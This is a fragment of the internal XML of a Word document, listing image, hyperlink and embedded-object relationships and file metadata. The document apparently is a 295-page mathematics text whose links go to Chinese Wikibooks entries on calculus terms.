TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.png"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.wmf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://genomics.cafs.ac.cn/fpc/cgi-bin/WebAGCoL/WebFcmp/fcmp.cgi" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/w/index.php?title=%E9%9A%90%E5%87%BD%E6%95%B0&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.png"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.jpeg"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/error/404.html?from=http%3a%2f%2fblog.csdn.net%2fu012380663%2farticle%2fdetails%2f43272851" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpeg"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/w/index.php?title=%E5%8E%9F%E5%87%BD%E6%95%B0&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/wiki/File:Function_absx.jpg" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.png"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject3.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://f.hiphotos.baidu.com/zhidao/pic/item/37d3d539b6003af33ff4bfef342ac65c1138b6f6.jpg" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/w/index.php?title=%E5%8F%AF%E5%AF%BC&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/w/index.php?title=%E5%85%85%E8%A6%81%E6%9D%A1%E4%BB%B6&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/wiki/%E6%96%B9%E7%A8%8B" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.png"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.jpeg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikipedia.org/wiki/%E9%BD%90%E6%AC%A1%E5%9D%90%E6%A0%87" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpeg"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://zh.wikibooks.org/w/index.php?title=%E5%8F%82%E6%95%B0%E6%96%B9%E7%A8%8B&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.png"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.jpeg"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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58</TotalTime>
  <Pages>295</Pages>
  <Words>19584</Words>
  <Characters>111630</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>930</Lines>
  <Paragraphs>261</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>130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lfd</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <cp:revision>46</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-04-27T03:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-24T02:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>